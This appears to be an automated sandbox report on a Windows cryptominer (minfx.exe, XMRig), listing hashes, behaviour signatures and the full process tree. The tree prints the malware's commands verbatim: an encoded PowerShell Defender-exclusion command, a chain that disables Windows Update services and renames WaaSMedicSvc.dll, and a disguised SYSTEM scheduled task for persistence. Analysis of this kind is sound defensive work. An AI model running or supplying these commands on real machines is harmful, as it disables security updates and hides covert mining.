General
Target

minfx.exe

Filesize

4MB

Completed

13-05-2022 17:57

Task

behavioral2

Score
10/10
MD5

8268ff95b3aaea6d6de8f02a73c323d2

SHA1

ae470145c4f5780315b52aa1c57ae0c04a2d18ca

SHA256

529831a3e5b7b61f74f7a426e828210017daf1eea2cbf7cf997c13d82822aef8

SHA512

9603dde1bfd9874637e63a268a7c8f85032892b4e58d3f96678dfbb52b453a972e00cd49077574e58726d3c5045788ede5a9b81c89a464342d5b64070c7325c0

Malware Config
Signatures 13

Defense Evasion
Impact
Persistence
  • xmrig

    Description

    XMRig is a high performance, open source, cross platform CPU/GPU miner.

    Tags

  • XMRig Miner Payload

    Tags

    Reported IOCs

    resource | yara_rule
    behavioral2/memory/3008-208-0x0000000140000000-0x0000000140803000-memory.dmp | xmrig
    behavioral2/memory/3008-209-0x000000014036DAD4-mapping.dmp | xmrig
    behavioral2/memory/3008-210-0x0000000140000000-0x0000000140803000-memory.dmp | xmrig
    behavioral2/memory/3008-211-0x0000000140000000-0x0000000140803000-memory.dmp | xmrig
    behavioral2/memory/3008-213-0x0000000140000000-0x0000000140803000-memory.dmp | xmrig
  • Executes dropped EXE
    updater.exe

    Reported IOCs

    pid | process
    1276 | updater.exe
  • Possible privilege escalation attempt
    takeown.exe, icacls.exe, takeown.exe, icacls.exe

    Tags

    Reported IOCs

    pid | process
    4400 | takeown.exe
    5000 | icacls.exe
    1124 | takeown.exe
    496 | icacls.exe
  • Stops running service(s)

    Tags

    TTPs

    Modify Existing Service, Service Stop
  • Modifies file permissions
    takeown.exe, icacls.exe, takeown.exe, icacls.exe

    Tags

    TTPs

    File Permissions Modification

    Reported IOCs

    pid | process
    4400 | takeown.exe
    5000 | icacls.exe
    1124 | takeown.exe
    496 | icacls.exe
  • Suspicious use of SetThreadContext
    conhost.exe

    Reported IOCs

    description | pid | process | target process
    PID 3424 set thread context of 3136 | 3424 | conhost.exe | conhost.exe
    PID 3424 set thread context of 3008 | 3424 | conhost.exe | explorer.exe
  • Launches sc.exe

    Description

    Sc.exe is a Windows utility to control services on the system.

  • Creates scheduled task(s)
    schtasks.exe

    Description

    Schtasks is often used by malware for persistence or to perform post-infection execution.

    TTPs

    Scheduled Task

    Reported IOCs

    pid | process
    5004 | schtasks.exe
  • Suspicious behavior: EnumeratesProcesses
    powershell.exe, conhost.exe, powershell.exe, conhost.exe, explorer.exe

    Reported IOCs

    pid | process
    4892 | powershell.exe
    4892 | powershell.exe
    3988 | conhost.exe
    3576 | powershell.exe
    3576 | powershell.exe
    3424 | conhost.exe
    3008 | explorer.exe
    3008 | explorer.exe
    3008 | explorer.exe
    3008 | explorer.exe
    3008 | explorer.exe
    3008 | explorer.exe
    3008 | explorer.exe
    3008 | explorer.exe
    3008 | explorer.exe
    3008 | explorer.exe
    3008 | explorer.exe
    3008 | explorer.exe
    3008 | explorer.exe
    3008 | explorer.exe
    3008 | explorer.exe
    3008 | explorer.exe
  • Suspicious behavior: LoadsDriver

    Reported IOCs

    pid | process
    664 |
  • Suspicious use of AdjustPrivilegeToken
    powershell.exe, conhost.exe, powercfg.exe, powercfg.exe, powercfg.exe, powercfg.exe, powershell.exe, conhost.exe, powercfg.exe, powercfg.exe, powercfg.exe, powercfg.exe, explorer.exe

    Reported IOCs

    description | pid | process
    Token: SeDebugPrivilege | 4892 | powershell.exe
    Token: SeDebugPrivilege | 3988 | conhost.exe
    Token: SeShutdownPrivilege | 1148 | powercfg.exe
    Token: SeCreatePagefilePrivilege | 1148 | powercfg.exe
    Token: SeShutdownPrivilege | 4408 | powercfg.exe
    Token: SeCreatePagefilePrivilege | 4408 | powercfg.exe
    Token: SeShutdownPrivilege | 4392 | powercfg.exe
    Token: SeCreatePagefilePrivilege | 4392 | powercfg.exe
    Token: SeShutdownPrivilege | 1388 | powercfg.exe
    Token: SeCreatePagefilePrivilege | 1388 | powercfg.exe
    Token: SeDebugPrivilege | 3576 | powershell.exe
    Token: SeDebugPrivilege | 3424 | conhost.exe
    Token: SeShutdownPrivilege | 2920 | powercfg.exe
    Token: SeCreatePagefilePrivilege | 2920 | powercfg.exe
    Token: SeShutdownPrivilege | 2968 | powercfg.exe
    Token: SeCreatePagefilePrivilege | 2968 | powercfg.exe
    Token: SeShutdownPrivilege | 3312 | powercfg.exe
    Token: SeCreatePagefilePrivilege | 3312 | powercfg.exe
    Token: SeShutdownPrivilege | 1380 | powercfg.exe
    Token: SeCreatePagefilePrivilege | 1380 | powercfg.exe
    Token: SeLockMemoryPrivilege | 3008 | explorer.exe
    Token: SeLockMemoryPrivilege | 3008 | explorer.exe
  • Suspicious use of WriteProcessMemory
    minfx.exe, conhost.exe, cmd.exe, cmd.exe, cmd.exe, cmd.exe

    Reported IOCs

    description | pid | process | target process
    PID 888 wrote to memory of 3988 | 888 | minfx.exe | conhost.exe
    PID 888 wrote to memory of 3988 | 888 | minfx.exe | conhost.exe
    PID 888 wrote to memory of 3988 | 888 | minfx.exe | conhost.exe
    PID 3988 wrote to memory of 1700 | 3988 | conhost.exe | cmd.exe
    PID 3988 wrote to memory of 1700 | 3988 | conhost.exe | cmd.exe
    PID 1700 wrote to memory of 4892 | 1700 | cmd.exe | powershell.exe
    PID 1700 wrote to memory of 4892 | 1700 | cmd.exe | powershell.exe
    PID 3988 wrote to memory of 4476 | 3988 | conhost.exe | cmd.exe
    PID 3988 wrote to memory of 4476 | 3988 | conhost.exe | cmd.exe
    PID 3988 wrote to memory of 4536 | 3988 | conhost.exe | cmd.exe
    PID 3988 wrote to memory of 4536 | 3988 | conhost.exe | cmd.exe
    PID 4476 wrote to memory of 5044 | 4476 | cmd.exe | sc.exe
    PID 4476 wrote to memory of 5044 | 4476 | cmd.exe | sc.exe
    PID 4476 wrote to memory of 3052 | 4476 | cmd.exe | sc.exe
    PID 4476 wrote to memory of 3052 | 4476 | cmd.exe | sc.exe
    PID 4536 wrote to memory of 1148 | 4536 | cmd.exe | powercfg.exe
    PID 4536 wrote to memory of 1148 | 4536 | cmd.exe | powercfg.exe
    PID 4476 wrote to memory of 1864 | 4476 | cmd.exe | sc.exe
    PID 4476 wrote to memory of 1864 | 4476 | cmd.exe | sc.exe
    PID 4476 wrote to memory of 3664 | 4476 | cmd.exe | sc.exe
    PID 4476 wrote to memory of 3664 | 4476 | cmd.exe | sc.exe
    PID 4536 wrote to memory of 4408 | 4536 | cmd.exe | powercfg.exe
    PID 4536 wrote to memory of 4408 | 4536 | cmd.exe | powercfg.exe
    PID 3988 wrote to memory of 3188 | 3988 | conhost.exe | cmd.exe
    PID 3988 wrote to memory of 3188 | 3988 | conhost.exe | cmd.exe
    PID 4536 wrote to memory of 4392 | 4536 | cmd.exe | powercfg.exe
    PID 4536 wrote to memory of 4392 | 4536 | cmd.exe | powercfg.exe
    PID 4476 wrote to memory of 1508 | 4476 | cmd.exe | sc.exe
    PID 4476 wrote to memory of 1508 | 4476 | cmd.exe | sc.exe
    PID 3188 wrote to memory of 5004 | 3188 | cmd.exe | schtasks.exe
    PID 3188 wrote to memory of 5004 | 3188 | cmd.exe | schtasks.exe
    PID 4476 wrote to memory of 4136 | 4476 | cmd.exe | sc.exe
    PID 4476 wrote to memory of 4136 | 4476 | cmd.exe | sc.exe
    PID 4536 wrote to memory of 1388 | 4536 | cmd.exe | powercfg.exe
    PID 4536 wrote to memory of 1388 | 4536 | cmd.exe | powercfg.exe
    PID 4476 wrote to memory of 3352 | 4476 | cmd.exe | sc.exe
    PID 4476 wrote to memory of 3352 | 4476 | cmd.exe | sc.exe
    PID 4476 wrote to memory of 4144 | 4476 | cmd.exe | sc.exe
    PID 4476 wrote to memory of 4144 | 4476 | cmd.exe | sc.exe
    PID 4476 wrote to memory of 4540 | 4476 | cmd.exe | sc.exe
    PID 4476 wrote to memory of 4540 | 4476 | cmd.exe | sc.exe
    PID 4476 wrote to memory of 2364 | 4476 | cmd.exe | sc.exe
    PID 4476 wrote to memory of 2364 | 4476 | cmd.exe | sc.exe
    PID 4476 wrote to memory of 2496 | 4476 | cmd.exe | sc.exe
    PID 4476 wrote to memory of 2496 | 4476 | cmd.exe | sc.exe
    PID 4476 wrote to memory of 2392 | 4476 | cmd.exe | sc.exe
    PID 4476 wrote to memory of 2392 | 4476 | cmd.exe | sc.exe
    PID 4476 wrote to memory of 2664 | 4476 | cmd.exe | sc.exe
    PID 4476 wrote to memory of 2664 | 4476 | cmd.exe | sc.exe
    PID 4476 wrote to memory of 3872 | 4476 | cmd.exe | sc.exe
    PID 4476 wrote to memory of 3872 | 4476 | cmd.exe | sc.exe
    PID 4476 wrote to memory of 4740 | 4476 | cmd.exe | sc.exe
    PID 4476 wrote to memory of 4740 | 4476 | cmd.exe | sc.exe
    PID 4476 wrote to memory of 4400 | 4476 | cmd.exe | takeown.exe
    PID 4476 wrote to memory of 4400 | 4476 | cmd.exe | takeown.exe
    PID 4476 wrote to memory of 5000 | 4476 | cmd.exe | icacls.exe
    PID 4476 wrote to memory of 5000 | 4476 | cmd.exe | icacls.exe
    PID 4476 wrote to memory of 4768 | 4476 | cmd.exe | reg.exe
    PID 4476 wrote to memory of 4768 | 4476 | cmd.exe | reg.exe
    PID 4476 wrote to memory of 1404 | 4476 | cmd.exe | reg.exe
    PID 4476 wrote to memory of 1404 | 4476 | cmd.exe | reg.exe
    PID 4476 wrote to memory of 1564 | 4476 | cmd.exe | reg.exe
    PID 4476 wrote to memory of 1564 | 4476 | cmd.exe | reg.exe
    PID 4476 wrote to memory of 2748 | 4476 | cmd.exe | reg.exe
Processes 85
  • C:\Users\Admin\AppData\Local\Temp\minfx.exe
    "C:\Users\Admin\AppData\Local\Temp\minfx.exe"
    Suspicious use of WriteProcessMemory
    PID:888
    • C:\Windows\System32\conhost.exe
      "C:\Windows\System32\conhost.exe" "C:\Users\Admin\AppData\Local\Temp\minfx.exe"
      Suspicious behavior: EnumeratesProcesses
      Suspicious use of AdjustPrivilegeToken
      Suspicious use of WriteProcessMemory
      PID:3988
      • C:\Windows\System32\cmd.exe
        "C:\Windows\System32\cmd.exe" cmd /c powershell -EncodedCommand "PAAjAHEAeQAjAD4AIABBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAAPAAjAHQAeABhACMAPgAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAAPAAjAHIAcwAjAD4AIAAtAEYAbwByAGMAZQAgADwAIwBiAHoAaABiACMAPgA="
        Suspicious use of WriteProcessMemory
        PID:1700
        • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
          powershell -EncodedCommand "PAAjAHEAeQAjAD4AIABBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAAPAAjAHQAeABhACMAPgAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAAPAAjAHIAcwAjAD4AIAAtAEYAbwByAGMAZQAgADwAIwBiAHoAaABiACMAPgA="
          Suspicious behavior: EnumeratesProcesses
          Suspicious use of AdjustPrivilegeToken
          PID:4892
      • C:\Windows\System32\cmd.exe
        "C:\Windows\System32\cmd.exe" cmd /c sc stop wuauserv & sc stop bits & sc stop dosvc & sc stop UsoSvc & sc stop WaaSMedicSvc & sc config wuauserv start= disabled & sc failure wuauserv reset= 0 actions= "" & sc config bits start= disabled & sc failure bits reset= 0 actions= "" & sc config dosvc start= disabled & sc failure dosvc reset= 0 actions= "" & sc config UsoSvc start= disabled & sc failure UsoSvc reset= 0 actions= "" & sc config wuauserv start= disabled & sc failure wuauserv reset= 0 actions= "" & takeown /f C:\\Windows\\System32\\WaaSMedicSvc.dll & icacls C:\\Windows\\System32\\WaaSMedicSvc.dll /grant *S-1-1-0:F /t /c /l /q & rename C:\\Windows\\System32\\WaaSMedicSvc.dll WaaSMedicSvc_BAK.dll & reg add "HKLM\\SYSTEM\\CurrentControlSet\\Services\\WaaSMedicSvc" /v Start /t REG_DWORD /d 4 /f & reg add "HKLM\\SYSTEM\\CurrentControlSet\\Services\\WaaSMedicSvc" /v FailureActions /t REG_BINARY /d 000000000000000000000000030000001400000000000000c0d4010000000000e09304000000000000000000 /f & reg add HKEY_LOCAL_MACHINE\\SOFTWARE\\Policies\\Microsoft\\Windows\\WindowsUpdate\\AU /v AUOptions /d 2 /t REG_DWORD /f & reg add HKEY_LOCAL_MACHINE\\SOFTWARE\\Policies\\Microsoft\\Windows\\WindowsUpdate\\AU /v AutoInstallMinorUpdates /d 0 /t REG_DWORD /f & reg add HKEY_LOCAL_MACHINE\\SOFTWARE\\Policies\\Microsoft\\Windows\\WindowsUpdate\\AU /v NoAutoUpdate /d 1 /t REG_DWORD /f & reg add HKEY_LOCAL_MACHINE\\SOFTWARE\\Policies\\Microsoft\\Windows\\WindowsUpdate\\AU /v NoAutoRebootWithLoggedOnUsers /d 1 /t REG_DWORD /f & SCHTASKS /Change /TN "\\Microsoft\\Windows\\WindowsUpdate\\Automatic App Update" /DISABLE & SCHTASKS /Change /TN "\\Microsoft\\Windows\\WindowsUpdate\\Scheduled Start" /DISABLE & SCHTASKS /Change /TN "\\Microsoft\\Windows\\WindowsUpdate\\sih" /DISABLE & SCHTASKS /Change /TN "\\Microsoft\\Windows\\WindowsUpdate\\sihboot" /DISABLE & SCHTASKS /Change /TN "\\Microsoft\\Windows\\UpdateOrchestrator\\UpdateAssistant" /DISABLE & SCHTASKS /Change /TN "\\Microsoft\\Windows\\UpdateOrchestrator\\UpdateAssistantCalendarRun" /DISABLE & SCHTASKS /Change /TN "\\Microsoft\\Windows\\UpdateOrchestrator\\UpdateAssistantWakeupRun" /DISABLE
        Suspicious use of WriteProcessMemory
        PID:4476
        • C:\Windows\system32\sc.exe
          sc stop wuauserv
          PID:5044
        • C:\Windows\system32\sc.exe
          sc stop bits
          PID:3052
        • C:\Windows\system32\sc.exe
          sc stop dosvc
          PID:1864
        • C:\Windows\system32\sc.exe
          sc stop UsoSvc
          PID:3664
        • C:\Windows\system32\sc.exe
          sc stop WaaSMedicSvc
          PID:1508
        • C:\Windows\system32\sc.exe
          sc config wuauserv start= disabled
          PID:4136
        • C:\Windows\system32\sc.exe
          sc failure wuauserv reset= 0 actions= ""
          PID:3352
        • C:\Windows\system32\sc.exe
          sc config bits start= disabled
          PID:4144
        • C:\Windows\system32\sc.exe
          sc failure bits reset= 0 actions= ""
          PID:4540
        • C:\Windows\system32\sc.exe
          sc config dosvc start= disabled
          PID:2364
        • C:\Windows\system32\sc.exe
          sc failure dosvc reset= 0 actions= ""
          PID:2496
        • C:\Windows\system32\sc.exe
          sc config UsoSvc start= disabled
          PID:2392
        • C:\Windows\system32\sc.exe
          sc failure UsoSvc reset= 0 actions= ""
          PID:2664
        • C:\Windows\system32\sc.exe
          sc config wuauserv start= disabled
          PID:3872
        • C:\Windows\system32\sc.exe
          sc failure wuauserv reset= 0 actions= ""
          PID:4740
        • C:\Windows\system32\takeown.exe
          takeown /f C:\\Windows\\System32\\WaaSMedicSvc.dll
          Possible privilege escalation attempt
          Modifies file permissions
          PID:4400
        • C:\Windows\system32\icacls.exe
          icacls C:\\Windows\\System32\\WaaSMedicSvc.dll /grant *S-1-1-0:F /t /c /l /q
          Possible privilege escalation attempt
          Modifies file permissions
          PID:5000
        • C:\Windows\system32\reg.exe
          reg add "HKLM\\SYSTEM\\CurrentControlSet\\Services\\WaaSMedicSvc" /v Start /t REG_DWORD /d 4 /f
          PID:4768
        • C:\Windows\system32\reg.exe
          reg add "HKLM\\SYSTEM\\CurrentControlSet\\Services\\WaaSMedicSvc" /v FailureActions /t REG_BINARY /d 000000000000000000000000030000001400000000000000c0d4010000000000e09304000000000000000000 /f
          PID:1404
        • C:\Windows\system32\reg.exe
          reg add HKEY_LOCAL_MACHINE\\SOFTWARE\\Policies\\Microsoft\\Windows\\WindowsUpdate\\AU /v AUOptions /d 2 /t REG_DWORD /f
          PID:1564
        • C:\Windows\system32\reg.exe
          reg add HKEY_LOCAL_MACHINE\\SOFTWARE\\Policies\\Microsoft\\Windows\\WindowsUpdate\\AU /v AutoInstallMinorUpdates /d 0 /t REG_DWORD /f
          PID:2748
        • C:\Windows\system32\reg.exe
          reg add HKEY_LOCAL_MACHINE\\SOFTWARE\\Policies\\Microsoft\\Windows\\WindowsUpdate\\AU /v NoAutoUpdate /d 1 /t REG_DWORD /f
          PID:404
        • C:\Windows\system32\reg.exe
          reg add HKEY_LOCAL_MACHINE\\SOFTWARE\\Policies\\Microsoft\\Windows\\WindowsUpdate\\AU /v NoAutoRebootWithLoggedOnUsers /d 1 /t REG_DWORD /f
          PID:2152
        • C:\Windows\system32\schtasks.exe
          SCHTASKS /Change /TN "\\Microsoft\\Windows\\WindowsUpdate\\Automatic App Update" /DISABLE
          PID:3296
        • C:\Windows\system32\schtasks.exe
          SCHTASKS /Change /TN "\\Microsoft\\Windows\\WindowsUpdate\\Scheduled Start" /DISABLE
          PID:2940
        • C:\Windows\system32\schtasks.exe
          SCHTASKS /Change /TN "\\Microsoft\\Windows\\WindowsUpdate\\sih" /DISABLE
          PID:3552
        • C:\Windows\system32\schtasks.exe
          SCHTASKS /Change /TN "\\Microsoft\\Windows\\WindowsUpdate\\sihboot" /DISABLE
          PID:4228
        • C:\Windows\system32\schtasks.exe
          SCHTASKS /Change /TN "\\Microsoft\\Windows\\UpdateOrchestrator\\UpdateAssistant" /DISABLE
          PID:1980
        • C:\Windows\system32\schtasks.exe
          SCHTASKS /Change /TN "\\Microsoft\\Windows\\UpdateOrchestrator\\UpdateAssistantCalendarRun" /DISABLE
          PID:2808
        • C:\Windows\system32\schtasks.exe
          SCHTASKS /Change /TN "\\Microsoft\\Windows\\UpdateOrchestrator\\UpdateAssistantWakeupRun" /DISABLE
          PID:1988
      • C:\Windows\System32\cmd.exe
        "C:\Windows\System32\cmd.exe" cmd /c powercfg /x -hibernate-timeout-ac 0 & powercfg /x -hibernate-timeout-dc 0 & powercfg /x -standby-timeout-ac 0 & powercfg /x -standby-timeout-dc 0
        Suspicious use of WriteProcessMemory
        PID:4536
        • C:\Windows\system32\powercfg.exe
          powercfg /x -hibernate-timeout-ac 0
          Suspicious use of AdjustPrivilegeToken
          PID:1148
        • C:\Windows\system32\powercfg.exe
          powercfg /x -hibernate-timeout-dc 0
          Suspicious use of AdjustPrivilegeToken
          PID:4408
        • C:\Windows\system32\powercfg.exe
          powercfg /x -standby-timeout-ac 0
          Suspicious use of AdjustPrivilegeToken
          PID:4392
        • C:\Windows\system32\powercfg.exe
          powercfg /x -standby-timeout-dc 0
          Suspicious use of AdjustPrivilegeToken
          PID:1388
      • C:\Windows\System32\cmd.exe
        "C:\Windows\System32\cmd.exe" cmd /c schtasks /create /f /sc onlogon /rl highest /ru "System" /tn "GoogleUpdateTaskMachineQC" /tr "C:\Users\Admin\AppData\Roaming\Chrome\updater.exe"
        Suspicious use of WriteProcessMemory
        PID:3188
        • C:\Windows\system32\schtasks.exe
          schtasks /create /f /sc onlogon /rl highest /ru "System" /tn "GoogleUpdateTaskMachineQC" /tr "C:\Users\Admin\AppData\Roaming\Chrome\updater.exe"
          Creates scheduled task(s)
          PID:5004
      • C:\Windows\System32\cmd.exe
        "C:\Windows\System32\cmd.exe" cmd /c "C:\Users\Admin\AppData\Roaming\Chrome\updater.exe"
        PID:4804
        • C:\Users\Admin\AppData\Roaming\Chrome\updater.exe
          C:\Users\Admin\AppData\Roaming\Chrome\updater.exe
          Executes dropped EXE
          PID:1276
          • C:\Windows\System32\conhost.exe
            "C:\Windows\System32\conhost.exe" "C:\Users\Admin\AppData\Roaming\Chrome\updater.exe"
            Suspicious use of SetThreadContext
            Suspicious behavior: EnumeratesProcesses
            Suspicious use of AdjustPrivilegeToken
            PID:3424
            • C:\Windows\System32\cmd.exe
              "C:\Windows\System32\cmd.exe" cmd /c powershell -EncodedCommand "PAAjAHEAeQAjAD4AIABBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAAPAAjAHQAeABhACMAPgAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAAPAAjAHIAcwAjAD4AIAAtAEYAbwByAGMAZQAgADwAIwBiAHoAaABiACMAPgA="
              PID:2176
              • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                powershell -EncodedCommand "PAAjAHEAeQAjAD4AIABBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAAPAAjAHQAeABhACMAPgAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAAPAAjAHIAcwAjAD4AIAAtAEYAbwByAGMAZQAgADwAIwBiAHoAaABiACMAPgA="
                Suspicious behavior: EnumeratesProcesses
                Suspicious use of AdjustPrivilegeToken
                PID:3576
            • C:\Windows\System32\cmd.exe
              "C:\Windows\System32\cmd.exe" cmd /c sc stop wuauserv & sc stop bits & sc stop dosvc & sc stop UsoSvc & sc stop WaaSMedicSvc & sc config wuauserv start= disabled & sc failure wuauserv reset= 0 actions= "" & sc config bits start= disabled & sc failure bits reset= 0 actions= "" & sc config dosvc start= disabled & sc failure dosvc reset= 0 actions= "" & sc config UsoSvc start= disabled & sc failure UsoSvc reset= 0 actions= "" & sc config wuauserv start= disabled & sc failure wuauserv reset= 0 actions= "" & takeown /f C:\\Windows\\System32\\WaaSMedicSvc.dll & icacls C:\\Windows\\System32\\WaaSMedicSvc.dll /grant *S-1-1-0:F /t /c /l /q & rename C:\\Windows\\System32\\WaaSMedicSvc.dll WaaSMedicSvc_BAK.dll & reg add "HKLM\\SYSTEM\\CurrentControlSet\\Services\\WaaSMedicSvc" /v Start /t REG_DWORD /d 4 /f & reg add "HKLM\\SYSTEM\\CurrentControlSet\\Services\\WaaSMedicSvc" /v FailureActions /t REG_BINARY /d 000000000000000000000000030000001400000000000000c0d4010000000000e09304000000000000000000 /f & reg add HKEY_LOCAL_MACHINE\\SOFTWARE\\Policies\\Microsoft\\Windows\\WindowsUpdate\\AU /v AUOptions /d 2 /t REG_DWORD /f & reg add HKEY_LOCAL_MACHINE\\SOFTWARE\\Policies\\Microsoft\\Windows\\WindowsUpdate\\AU /v AutoInstallMinorUpdates /d 0 /t REG_DWORD /f & reg add HKEY_LOCAL_MACHINE\\SOFTWARE\\Policies\\Microsoft\\Windows\\WindowsUpdate\\AU /v NoAutoUpdate /d 1 /t REG_DWORD /f & reg add HKEY_LOCAL_MACHINE\\SOFTWARE\\Policies\\Microsoft\\Windows\\WindowsUpdate\\AU /v NoAutoRebootWithLoggedOnUsers /d 1 /t REG_DWORD /f & SCHTASKS /Change /TN "\\Microsoft\\Windows\\WindowsUpdate\\Automatic App Update" /DISABLE & SCHTASKS /Change /TN "\\Microsoft\\Windows\\WindowsUpdate\\Scheduled Start" /DISABLE & SCHTASKS /Change /TN "\\Microsoft\\Windows\\WindowsUpdate\\sih" /DISABLE & SCHTASKS /Change /TN "\\Microsoft\\Windows\\WindowsUpdate\\sihboot" /DISABLE & SCHTASKS /Change /TN "\\Microsoft\\Windows\\UpdateOrchestrator\\UpdateAssistant" /DISABLE & SCHTASKS /Change /TN "\\Microsoft\\Windows\\UpdateOrchestrator\\UpdateAssistantCalendarRun" /DISABLE & SCHTASKS /Change /TN "\\Microsoft\\Windows\\UpdateOrchestrator\\UpdateAssistantWakeupRun" /DISABLE
              PID:4312
              • C:\Windows\system32\sc.exe
                sc stop wuauserv
                PID:4512
              • C:\Windows\system32\sc.exe
                sc stop bits
                PID:868
              • C:\Windows\system32\sc.exe
                sc stop dosvc
                PID:4468
              • C:\Windows\system32\sc.exe
                sc stop UsoSvc
                PID:1592
              • C:\Windows\system32\sc.exe
                sc stop WaaSMedicSvc
                PID:3524
              • C:\Windows\system32\sc.exe
                sc config wuauserv start= disabled
                PID:3420
              • C:\Windows\system32\sc.exe
                sc failure wuauserv reset= 0 actions= ""
                PID:4460
              • C:\Windows\system32\sc.exe
                sc config bits start= disabled
                PID:1244
              • C:\Windows\system32\sc.exe
                sc failure bits reset= 0 actions= ""
                PID:1004
              • C:\Windows\system32\sc.exe
                sc config dosvc start= disabled
                PID:4572
              • C:\Windows\system32\sc.exe
                sc failure dosvc reset= 0 actions= ""
                PID:4760
              • C:\Windows\system32\sc.exe
                sc config UsoSvc start= disabled
                PID:4120
              • C:\Windows\system32\sc.exe
                sc failure UsoSvc reset= 0 actions= ""
                PID:1096
              • C:\Windows\system32\sc.exe
                sc config wuauserv start= disabled
                PID:1724
              • C:\Windows\system32\sc.exe
                sc failure wuauserv reset= 0 actions= ""
                PID:3568
              • C:\Windows\system32\takeown.exe
                takeown /f C:\\Windows\\System32\\WaaSMedicSvc.dll
                Possible privilege escalation attempt
                Modifies file permissions
                PID:1124
              • C:\Windows\system32\icacls.exe
                icacls C:\\Windows\\System32\\WaaSMedicSvc.dll /grant *S-1-1-0:F /t /c /l /q
                Possible privilege escalation attempt
                Modifies file permissions
                PID:496
              • C:\Windows\system32\reg.exe
                reg add "HKLM\\SYSTEM\\CurrentControlSet\\Services\\WaaSMedicSvc" /v Start /t REG_DWORD /d 4 /f
                PID:2952
              • C:\Windows\system32\reg.exe
                reg add "HKLM\\SYSTEM\\CurrentControlSet\\Services\\WaaSMedicSvc" /v FailureActions /t REG_BINARY /d 000000000000000000000000030000001400000000000000c0d4010000000000e09304000000000000000000 /f
                PID:3892
              • C:\Windows\system32\reg.exe
                reg add HKEY_LOCAL_MACHINE\\SOFTWARE\\Policies\\Microsoft\\Windows\\WindowsUpdate\\AU /v AUOptions /d 2 /t REG_DWORD /f
                PID:4012
              • C:\Windows\system32\reg.exe
                reg add HKEY_LOCAL_MACHINE\\SOFTWARE\\Policies\\Microsoft\\Windows\\WindowsUpdate\\AU /v AutoInstallMinorUpdates /d 0 /t REG_DWORD /f
                PID:3872
              • C:\Windows\system32\reg.exe
                reg add HKEY_LOCAL_MACHINE\\SOFTWARE\\Policies\\Microsoft\\Windows\\WindowsUpdate\\AU /v NoAutoUpdate /d 1 /t REG_DWORD /f
                PID:2672
              • C:\Windows\system32\reg.exe
                reg add HKEY_LOCAL_MACHINE\\SOFTWARE\\Policies\\Microsoft\\Windows\\WindowsUpdate\\AU /v NoAutoRebootWithLoggedOnUsers /d 1 /t REG_DWORD /f
                PID:2340
              • C:\Windows\system32\schtasks.exe
                SCHTASKS /Change /TN "\\Microsoft\\Windows\\WindowsUpdate\\Automatic App Update" /DISABLE
                PID:1744
              • C:\Windows\system32\schtasks.exe
                SCHTASKS /Change /TN "\\Microsoft\\Windows\\WindowsUpdate\\Scheduled Start" /DISABLE
                PID:672
              • C:\Windows\system32\schtasks.exe
                SCHTASKS /Change /TN "\\Microsoft\\Windows\\WindowsUpdate\\sih" /DISABLE
                PID:1764
              • C:\Windows\system32\schtasks.exe
                SCHTASKS /Change /TN "\\Microsoft\\Windows\\WindowsUpdate\\sihboot" /DISABLE
                PID:112
              • C:\Windows\system32\schtasks.exe
                SCHTASKS /Change /TN "\\Microsoft\\Windows\\UpdateOrchestrator\\UpdateAssistant" /DISABLE
                PID:4076
              • C:\Windows\system32\schtasks.exe
                SCHTASKS /Change /TN "\\Microsoft\\Windows\\UpdateOrchestrator\\UpdateAssistantCalendarRun" /DISABLE
                PID:4884
              • C:\Windows\system32\schtasks.exe
                SCHTASKS /Change /TN "\\Microsoft\\Windows\\UpdateOrchestrator\\UpdateAssistantWakeupRun" /DISABLE
                PID:32
            • C:\Windows\System32\cmd.exe
              "C:\Windows\System32\cmd.exe" cmd /c powercfg /x -hibernate-timeout-ac 0 & powercfg /x -hibernate-timeout-dc 0 & powercfg /x -standby-timeout-ac 0 & powercfg /x -standby-timeout-dc 0
              PID:4196
              • C:\Windows\system32\powercfg.exe
                powercfg /x -hibernate-timeout-ac 0
                Suspicious use of AdjustPrivilegeToken
                PID:2920
              • C:\Windows\system32\powercfg.exe
                powercfg /x -hibernate-timeout-dc 0
                Suspicious use of AdjustPrivilegeToken
                PID:2968
              • C:\Windows\system32\powercfg.exe
                powercfg /x -standby-timeout-ac 0
                Suspicious use of AdjustPrivilegeToken
                PID:3312
              • C:\Windows\system32\powercfg.exe
                powercfg /x -standby-timeout-dc 0
                Suspicious use of AdjustPrivilegeToken
                PID:1380
            • C:\Windows\System32\conhost.exe
              C:\Windows\System32\conhost.exe
              PID:3136
            • C:\Windows\explorer.exe
              C:\Windows\explorer.exe clcmeewnjgen0
              Suspicious behavior: EnumeratesProcesses
              Suspicious use of AdjustPrivilegeToken
              PID:3008
Network
MITRE ATT&CK Matrix
Collection
Command and Control
Credential Access
Discovery
Execution
Exfiltration
Impact
Initial Access
Lateral Movement
Privilege Escalation
Downloads
                    • C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\conhost.exe.log

                      MD5

                      8add56521ef894ef0c66ecd3e989d718

                      SHA1

                      2058aa5185fd5dcce7263bef8fe35bf5e12dbc7f

                      SHA256

                      01bcb6c8348b83208a7c923fd840130a0bc7b3a188b62ad8e270a296ed94b724

                      SHA512

